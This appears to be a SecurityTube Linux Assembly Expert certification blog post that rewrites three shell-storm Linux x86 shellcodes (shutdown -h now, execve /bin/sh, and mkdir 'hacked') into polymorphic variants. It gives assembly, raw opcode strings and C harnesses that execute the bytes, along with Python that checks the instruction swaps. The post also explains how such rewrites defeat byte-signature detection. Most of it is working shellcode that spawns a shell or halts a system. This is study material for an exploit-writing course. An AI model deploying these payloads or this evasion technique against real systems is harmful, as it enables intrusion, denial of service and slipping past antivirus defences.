0x06 SLAE - Polymorphic versions
shellcode-876.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)
global _start
_start:
xor eax,eax
xor edx,edx
push eax
push 0x682d
mov edi,esp
push eax
push 0x6e
mov WORD [esp+0x1],0x776f
mov edi,esp
push eax
push 0x6e776f64
push 0x74756873
push 0x2f2f2f6e
push 0x6962732f
mov ebx,esp
push edx
push esi
push edi
push ebx
mov ecx,esp
mov al,0xb
int 0x80
The original shellcode has 56 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-876.php
shellcode-876-poly.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 69 bytes
global _start
_start:
cdq
mul edx
push word 0x682d
mov edi, esp
push eax
push 0x6e
mov WORD [esp+0x1],0x776f
mov edi, esp
push eax
mov dword [esp-4], 0x6e776f64
mov dword [esp-8], 0x74756873
mov dword [esp-12], 0x2f2f2f6e
mov dword [esp-16], 0x6962732f
sub esp, 16
mov ebx, esp
push edx
push esi
push edi
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
As we can see in the block of code above, some of the assembly instructions have been modified, which gives a different shellcode that produces the same result. The modified version has 69 bytes, which is less than 150% of the original shellcode; the maximum allowed by the assignment for this sample is 84 bytes.
The shellcode is:
\x99\xf7\xe2\x66\x68\x2d\x68\x89\xe7\x50\x6a\x6e\x66\xc7\x44\x24\x01\x6f\x77\x89
\xe7\x50\xc7\x44\x24\xfc\x64\x6f\x77\x6e\xc7\x44\x24\xf8\x73\x68\x75\x74\xc7\x44
\x24\xf4\x6e\x2f\x2f\x2f\xc7\x44\x24\xf0\x2f\x73\x62\x69\x83\xec\x10\x89\xe3\x52
\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80
Here is also a simple demo of the shellcode generation and execution.

/*
Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
Date : 10 Feb 2011
Author : kernel_panik
Thanks : cOokie, agix, antrhacks
*/
/*
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f ;; hs//
push 0x6e69622f ;; nib/
mov ebx, esp
mov al, 11
int 0x80
*/
#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
              "\xe3\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
    printf("Shellcode length : %d bytes\n", (int)strlen(code));
    /* Cast the buffer to a function pointer and call it; the buffer has to be
       in executable memory (the usual build is gcc -fno-stack-protector -z execstack). */
    int (*f)() = (int (*)())code;
    f();
    return 0;
}
The original shellcode has 21 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-752.php
; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes
global _start
_start:
xor eax, eax
xor ecx, ecx
push eax
mov dword [esp-4], 0x68732f2f
mov dword [esp-8], 0x6e69622f
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
The polymorphic version has 30 bytes, which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was already very small, there is less room to shrink it with different instructions. The maximum size allowed is 31 bytes. One caveat: the original zeroes edx as a side effect of mul ecx, whereas this version never touches edx, so the envp argument of execve() is whatever edx held at entry; that is zero when the kernel starts the program at _start, but it is not guaranteed when the bytes are called from a C test harness.
Here is the shellcode:
\x31\xc0\x31\xc9\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80
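The instruction substitution used in both rewrites above (the push chains of shellcode-876 and shellcode-752 replaced by mov dword [esp-N], imm32 stores followed by a single sub esp, N) can be checked mechanically. The following Python is an added example, not code from the original post or from the shell-storm samples: it encodes and simulates the four x86-32 forms involved (push eax/ecx with the register already zeroed, push imm32, mov dword [esp+disp8], imm32, and sub esp, imm8), runs each original/polymorphic pair, and compares the resulting stack contents and machine code. The opcode encodings are the real ones; the flat little-endian memory model and the start value of esp are assumptions of the simulation.

```python
"""Instruction-substitution check for the stack-built strings on this page.

Added example, not part of the original post or of the shell-storm samples: a
minimal interpreter for the four x86-32 forms the two rewrites rely on, so the
original 'push imm32' chains (shellcode-876 and 752) and the polymorphic
'mov dword [esp-N], imm32 ... sub esp, N' chains can be run side by side and
their stack memory compared byte for byte. Encodings are the real ones
(50/51 push eax/ecx, 68 imm32, c7 44 24 disp8 imm32, 83 ec imm8); the flat
memory model and START_ESP are constructed assumptions.
"""
import struct

START_ESP = 0x1000  # constructed: any 4-byte aligned value works for the simulation


class Stack:
    """Just enough of an x86-32 stack to follow push / mov [esp+d] / sub esp."""

    def __init__(self):
        self.esp = START_ESP
        self.mem = {}

    def _write(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b

    def cstring_at_esp(self):
        """Bytes from esp up to and including the first NUL (unwritten memory reads as 0)."""
        out, addr = bytearray(), self.esp
        while True:
            b = self.mem.get(addr, 0)
            out.append(b)
            if b == 0:
                return bytes(out)
            addr += 1


def run(program):
    """Execute a list of (mnemonic, operands...) tuples; return (machine code, final Stack)."""
    st, code = Stack(), bytearray()
    for ins in program:
        op = ins[0]
        if op == "push_zero_reg":        # push eax / push ecx, register known to hold 0
            code += bytes([ins[1]])
            st.esp -= 4
            st._write(st.esp, b"\0\0\0\0")
        elif op == "push32":             # push imm32            -> 68 imm32
            code += b"\x68" + struct.pack("<I", ins[1])
            st.esp -= 4
            st._write(st.esp, struct.pack("<I", ins[1]))
        elif op == "mov_esp":            # mov dword [esp+disp8], imm32 -> c7 44 24 disp8 imm32
            code += b"\xc7\x44\x24" + struct.pack("<b", ins[1]) + struct.pack("<I", ins[2])
            st._write(st.esp + ins[1], struct.pack("<I", ins[2]))
        elif op == "sub_esp":            # sub esp, imm8          -> 83 ec imm8
            code += b"\x83\xec" + bytes([ins[1]])
            st.esp -= ins[1]
        else:
            raise ValueError(op)
    return bytes(code), st


# The string-building part of each sample, transcribed from the listings on this page.
SHUTDOWN_ORIGINAL = [("push_zero_reg", 0x50), ("push32", 0x6e776f64), ("push32", 0x74756873),
                     ("push32", 0x2f2f2f6e), ("push32", 0x6962732f)]
SHUTDOWN_POLY = [("push_zero_reg", 0x50), ("mov_esp", -4, 0x6e776f64), ("mov_esp", -8, 0x74756873),
                 ("mov_esp", -12, 0x2f2f2f6e), ("mov_esp", -16, 0x6962732f), ("sub_esp", 16)]
BINSH_ORIGINAL = [("push_zero_reg", 0x51), ("push32", 0x68732f2f), ("push32", 0x6e69622f)]
BINSH_POLY = [("push_zero_reg", 0x50), ("mov_esp", -4, 0x68732f2f), ("mov_esp", -8, 0x6e69622f),
              ("sub_esp", 8)]


def compare(original, poly):
    """Return (string left by original, string left by poly, original code, poly code)."""
    orig_code, orig_stack = run(original)
    poly_code, poly_stack = run(poly)
    return orig_stack.cstring_at_esp(), poly_stack.cstring_at_esp(), orig_code, poly_code


if __name__ == "__main__":
    for name, o, p in (("shutdown", SHUTDOWN_ORIGINAL, SHUTDOWN_POLY),
                       ("bin/sh", BINSH_ORIGINAL, BINSH_POLY)):
        s1, s2, c1, c2 = compare(o, p)
        print(name, "same string:", s1 == s2, s1, len(c1), "->", len(c2), "bytes,",
              "rewrite NUL-free:", b"\0" not in c2)
```

Both pairs leave the identical NUL-terminated path at esp while the machine code differs from the first byte after the push of the zero register; the cost is size, since each mov dword [esp+disp8], imm32 takes 8 bytes against 5 for push imm32, plus 3 for the closing sub esp, which is where the growth of both rewrites comes from. The disp8 form also stays free of NUL bytes because the displacements are negative (0xfc, 0xf8, ...).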
/*
 * This shellcode will do a mkdir() of 'hacked' and then an exit()
 * Written by [email protected]
 *
 */
char shellcode[]=
"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
"\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
"\x61\x63\x6b\x65\x64\x23";

int main(void)
{
    int *ret;
    /* Overwrite main's saved return address with the address of the buffer,
       so returning from main jumps into the shellcode. The +2 offset assumes
       the classic 32-bit frame layout (local, saved ebp, return address). */
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
    return 0;
}
The sample can be accessed from shell storm: http://shell-storm.org/shellcode/files/shellcode-542.php
The author only gave the shellcode bytes. So, for the purpose of the SLAE, we first disassemble it to understand it better and to be able to create a polymorphic version of it.
echo -ne "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68\x61\x63\x6b\x65\x64\x23" >shellcode542
ndisasm -b32 shellcode542
00000000 EB16 jmp short 0x18
00000002 5E pop esi
00000003 31C0 xor eax,eax
00000005 884606 mov [esi+0x6],al
00000008 B027 mov al,0x27
0000000A 8D1E lea ebx,[esi]
0000000C 66B9ED01 mov cx,0x1ed
00000010 CD80 int 0x80
00000012 B001 mov al,0x1
00000014 31DB xor ebx,ebx
00000016 CD80 int 0x80
00000018 E8E5FFFFFF call 0x2
0000001D 6861636B65 push dword 0x656b6361
00000022 64 fs
00000023 23 db 0x23
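To follow what ndisasm shows above, here is an added Python example (not from the original post) that resolves the jmp / call / pop trick directly from the raw bytes: it computes the branch targets the way a disassembler does (address of the next instruction plus the sign-extended displacement), finds where the call's pushed return address puts the string, and decodes the NUL-terminating store and the mode immediate that mkdir() receives. The hex literal is the page's 36 bytes; offsets are relative to the start of the blob and nothing is executed.

```python
"""Resolving the jmp / call / pop addressing in shellcode-542 from its bytes.

Added example, not from the original post: a small decoder for the three
position-independent instructions the shell-storm sample uses to find its own
data (jmp short rel8, call rel32, pop esi), followed by the 'mov [esi+6], al'
store that terminates the string. Branch targets are computed the way ndisasm
does: next instruction address + sign-extended displacement.
"""
import struct

# The 36 bytes printed on this page, as a hex literal.
SHELLCODE_542 = bytes.fromhex(
    "eb165e31c0884606b0278d1e66b9ed01cd80b00131dbcd80e8e5ffffff6861636b656423"
)


def jmp_short_target(code, off):
    """eb rel8: target = address of the next instruction (off + 2) + sign-extended rel8."""
    if code[off] != 0xEB:
        raise ValueError("no jmp short at offset %#x" % off)
    rel = struct.unpack_from("<b", code, off + 1)[0]
    return off + 2 + rel


def call_rel32(code, off):
    """e8 rel32: returns (target, return address).

    The return address is what the call pushes, hence what a later pop esi loads."""
    if code[off] != 0xE8:
        raise ValueError("no call rel32 at offset %#x" % off)
    rel = struct.unpack_from("<i", code, off + 1)[0]
    ret = off + 5
    return ret + rel, ret


def resolve(code):
    """Follow jmp -> call -> pop esi and decode the operands handed to mkdir() (eax = 0x27)."""
    call_off = jmp_short_target(code, 0)              # entry jmp lands on the call
    pop_off, data_off = call_rel32(code, call_off)    # call pushes &data and jumps back
    if code[pop_off] != 0x5E:                          # 5e = pop esi, so esi = &data
        raise ValueError("call target is not pop esi")
    # 88 46 disp8 = mov [esi+disp8], al; eax was zeroed just before, so this stores the NUL
    store = code.index(b"\x88\x46", pop_off)
    nul_at = code[store + 2]
    # 66 b9 imm16 = mov cx, imm16: the second argument of mkdir(path, mode)
    mode_ins = code.index(b"\x66\xb9", pop_off)
    mode = struct.unpack_from("<H", code, mode_ins + 2)[0]
    data = code[data_off:]
    return {
        "call_offset": call_off,
        "pop_offset": pop_off,
        "data_offset": data_off,
        "raw_data": data,            # bytes as they sit in the blob, placeholder byte included
        "name": data[:nul_at],       # what the kernel sees after the NUL store
        "mode": mode,
        "nul_free": b"\x00" not in code,
    }


if __name__ == "__main__":
    info = resolve(SHELLCODE_542)
    print("jmp ->", hex(info["call_offset"]), "call ->", hex(info["pop_offset"]),
          "esi =", hex(info["data_offset"]))
    print("raw:", info["raw_data"], "mkdir(%r, %s)" % (info["name"], oct(info["mode"])),
          "NUL-free:", info["nul_free"])
```

The entry jmp lands on the call at offset 0x18, the call pushes 0x1d (the start of "hacked#") and jumps back to the pop esi at offset 2, and the byte store at esi+6 replaces the '#' placeholder with a NUL, which is how the sample gets a terminated string without carrying a zero byte; the mode immediate 0x1ed decodes to octal 0755. This is the part the polymorphic version below does away with entirely, by pushing an already terminated string onto the stack.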
The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.
I realized that a lot of the assembly in the original can be rewritten to produce a different version of it. Let's keep it simple. Basically, the shellcode creates a directory named "hacked" with the rights 775.
My final polymorphic assembly is quite different but does the same thing.
; http://shell-storm.org/shellcode/files/shellcode-542.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 28 bytes
global _start
_start:
xor eax,eax
push eax
;sys mkdir
mov al,0x27
; push ./hacked
push 0x64656b63
push 0x61682f2e
mov ebx,esp
; mode 0777 (octal), which is 0x1ff in hex
mov cx, 0x1ff
int 0x80
;sys exit
push 0x1
pop eax
int 0x80
\x31\xc0\x50\xb0\x27\x68\x63\x6b\x65\x64\x68\x2e\x2f\x68\x61\x89\xe3\x66\xb9\xff\x01\xcd\x80\x6a\x01\x58\xcd\x80
The polymorphic version has 28 bytes, so it's smaller than the original one, which is great.
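To check the assignment's size rule for all three samples, and to see how much of each original a byte signature would still match after the rewrite, here is an added Python example (not part of the original post) that works on the byte strings printed on this page: it parses them, applies the 150% rule, finds the longest byte run shared by an original and its polymorphic version, and locates the int 0x80 stubs that every variant keeps. The 876 pair is handled by length only, since the page prints just its polymorphic bytes; the lengths 56 and 69 are taken from the text above.

```python
"""Size-rule and byte-overlap check for the original/polymorphic pairs on this page.

Added example, not part of the original post. The byte strings below are the
ones printed on the page (752 and 542 originals from shell-storm's C files,
752 and 542 rewrites from the polymorphic listings).
"""


def parse_escaped(s):
    """Turn a C-style "\\x31\\xc0..." literal into bytes."""
    return bytes.fromhex(s.replace("\\x", "").replace("\n", "").replace(" ", ""))


def within_size_limit(orig_len, poly_len, factor=1.5):
    """SLAE rule: the polymorphic version may not exceed 150% of the original."""
    return poly_len <= orig_len * factor


def longest_common_run(a, b):
    """Longest contiguous byte sequence present in both a and b (classic O(len(a)*len(b)) DP)."""
    best_len, best_end = 0, 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                if cur[j] > best_len:
                    best_len, best_end = cur[j], i
        prev = cur
    return a[best_end - best_len:best_end]


def signature_hits(sample, signature):
    """All offsets at which a fixed byte pattern occurs in sample (overlaps allowed)."""
    hits, start = [], 0
    while True:
        idx = sample.find(signature, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


ORIG_752 = parse_escaped(r"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80")
POLY_752 = parse_escaped(r"\x31\xc0\x31\xc9\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8"
                         r"\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80")
ORIG_542 = parse_escaped(r"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed\x01\xcd\x80"
                         r"\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68\x61\x63\x6b\x65\x64\x23")
POLY_542 = parse_escaped(r"\x31\xc0\x50\xb0\x27\x68\x63\x6b\x65\x64\x68\x2e\x2f\x68\x61\x89\xe3"
                         r"\x66\xb9\xff\x01\xcd\x80\x6a\x01\x58\xcd\x80")
SYSCALL = b"\xcd\x80"  # int 0x80: the one sequence every x86-32 Linux syscall stub keeps


def report(orig, poly):
    """Summarise one original/polymorphic pair."""
    return {
        "orig_len": len(orig),
        "poly_len": len(poly),
        "size_ok": within_size_limit(len(orig), len(poly)),
        "longest_shared": longest_common_run(orig, poly),
        "int80_offsets": signature_hits(poly, SYSCALL),
    }


if __name__ == "__main__":
    print("876 by length (56 -> 69):", "ok" if within_size_limit(56, 69) else "TOO BIG")
    for name, o, p in (("752", ORIG_752, POLY_752), ("542", ORIG_542, POLY_542)):
        r = report(o, p)
        print(name, r["orig_len"], "->", r["poly_len"], "ok" if r["size_ok"] else "TOO BIG",
              "longest shared run:", r["longest_shared"].hex(), "int 0x80 at", r["int80_offsets"])
```

The shared runs are short: the six-byte mov ebx,esp / mov al,0xb / int 0x80 tail for 752, and the four bytes of "cked" for 542. That is why detection built on behaviour (an execve() of /bin//sh, a mkdir() followed by exit()) holds up better than a signature written for the original bytes, which a rewrite like the ones on this page breaks with a handful of instruction swaps.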
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification
Student ID: SLAE-1374